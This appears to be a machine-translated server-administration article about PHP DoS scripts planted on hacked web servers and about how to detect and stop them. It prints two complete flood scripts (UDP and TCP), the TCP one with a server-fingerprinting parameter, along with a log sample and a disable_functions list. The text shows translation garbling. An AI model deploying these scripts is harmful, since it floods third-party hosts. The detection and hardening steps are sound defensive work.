I. Analysis of php Outsourcing
Use php code to call sockets and directly use the server's network to attack other IP addresses. The common code is as follows:
Copy codeThe Code is as follows: $ packets = 0;
$ Ip = $ _ GET [\ 'IP \ '];
$ Rand = $ _ GET [\ 'port \ '];
Set_time_limit (0 );
Ignore_user_abort (FALSE );
$ Exec_time = $ _ GET [\ 'time \ '];
$ Time = time ();
Print \ "Flooded: $ ip on port $ rand
\";
$ Max_time = $ time + $ exec_time;
For ($ I = 0; I I <65535; $ I ++ ){
$ Out. = \ "X \";
}
While (1 ){
$ Packets ++;
If (time ()> $ max_time ){
Break;
}
$ Fp = fsockopen (\ "udp: // $ ip \", $ rand, $ errno, $ errstr, 5 );
If ($ fp ){
Fwrite ($ fp, $ out );
Fclose ($ fp );
}
}
Echo \ "Packet complete at \". time (\ 'H: I: s \ '). \"
$ Packets (\ ". round ($ packets x 65)/1024, 2). \" mB) packets averaging \".
Round ($ packets/$ exec_time, 2). \ "packets/s \ n \";
?>
Ii. presentation features
When IIS is enabled, the outbound bandwidth of the server is used up. That is to say, the server continuously sends packets to others. This is different from the DDOS attack, where the server continuously receives a large number of packets.
This problem has recently occurred to a large number of servers due to the DEDECMS vulnerability.
How to quickly find these sites?
You can open the log
C: \ Windows \ System32 \ LogFiles \ HTTPERR \ httperr... log, open the file today,
There are records like this:
06:37:28 58.20.112.112 26817 98.126.247.13 80 HTTP/1.1 GET/xxxx/xxxxxx. php? Host = 122.224.32.100 & port = 445 & time = 120 503 783 Disabled 30_FreeHost_1
Last three items 783 Disabled 30_FreeHost_1
783 is the ID in IIS
30_FreeHost_1 is the pool
Iii. Solution
1. Locate the website and stop it. Or stop the pool, and restart IIS.
2. Disable all udp sending in IP policy or firewall
In the latest version of the security package, the version 4.0 IP policy [Download safe package] is included. After importing the package, you can directly restrict Outbound UDP packets. Download the package and then import the security policy. However, this policy does not close the DNS port, and some attacks are still valid.
To solve this problem, you can also adjust the IP policy to restrict udp to access only the IP address of a specific DNS server, such as 8.8.8.8. The attack will also be ineffective unless hackers attack this IP address, you can set a dns ip address that you only know in the nic dns, and do not disclose it. Then you can call the udp open part in the IP policy to solve the problem. (open the properties of the IP policy, double-click open, delete any of the two udp records in open, in the retained, double-click, change the address from any source address to the target address. "The specific IP address is set as your own dns ip address, for example, 8.8.8.8." Save the IP address and click "OK)
On, we uploaded a new security package, which contains an "out-of-the-star VM management platform IP policy to disable all UDP ports. ipsec file, you can import it and enable it to close all udp ports to completely prevent such attacks. However, this policy has disabled the DNS port, this server cannot use IE to access any domain name. Therefore, the user's collection function cannot be used. (Similarly, if this policy is used on the master website, the controlled self-check will fail because the domain name cannot be resolved. In addition, some users report that this policy will cause mysql to be abnormal)
3. Use first-class information monitoring. In SQL interception and website interception, intercept port = this keyword (other keywords can be deleted .)
4. You can also directly disable the above Code, for example, change win \ php. ini and restart IIS.
Ignore_user_abort = On
(Pay attention to the previous; number to be deleted)
Disable_functions = exec, system, passthru, popen, pclose, shell_exec, proc_open, curl_exec, multi_exec, dl, chmod, stream_socket_server, popepassthru, pfsockopen, gzinflate,
Add
Fsockopen, set_time_limit
However, this will cause many php programs to become abnormal.
In addition, this also indicates that your server security is doing a good job. If you can intrude into the server, hackers will directly escalate permissions. What else do DOS do?
A new PHP dos code based on TCP attacks has been developed recently:Copy codeThe Code is as follows: set_time_limit (999999 );
$ Host = $ _ GET ['host'];
$ Port = $ _ GET ['Port'];
$ Exec_time = $ _ GET ['time'];
$ Packets = 64;
Ignore_user_abort (True );
If (StrLen ($ host) = 0 or StrLen ($ port) = 0 or StrLen ($ exec_time) = 0 ){
If (StrLen ($ _ GET ['rat ']) <> 0 ){
Echo $ _ GET ['rat ']. $ _ SERVER ["HTTP_HOST"]. "| ". getHostByName ($ _ SERVER ['server _ name']). "| ".
Php_uname (). "|". $ _ SERVER ['server _ soft']. $ _ GET ['rat '];
Exit;
}
Exit;
}
$ Max_time = time () + $ exec_time;
While (1 ){
$ Packets ++;
If (time ()> $ max_time or $ exec_time! = 69 ){
Break;
}
$ Fp = fsockopen ("tcp: // $ host", $ port, $ errno, $ errstr, 0 );
}
?>
Likewise, the following solutions are available:
1. You can also directly disable the above Code, for example, change win \ php. ini and restart IIS.
Ignore_user_abort = On
(Pay attention to the previous; number to be deleted)
Disable_functions = exec, system, passthru, popen, pclose, shell_exec, proc_open, curl_exec, multi_exec, dl, chmod, stream_socket_server, popepassthru, pfsockopen, gzinflate,
Add
Fsockopen, set_time_limit
However, this will cause many php programs to become abnormal.
2. prohibit all outbound TCP data packets in the IP policy, but this will result in invalid collection function and cannot be used on the master server.
3. on the server, use the keyword tcp: or udp: To search for all php files, find the attack file, and delete it.
The above methods are available to vps and server hosting users!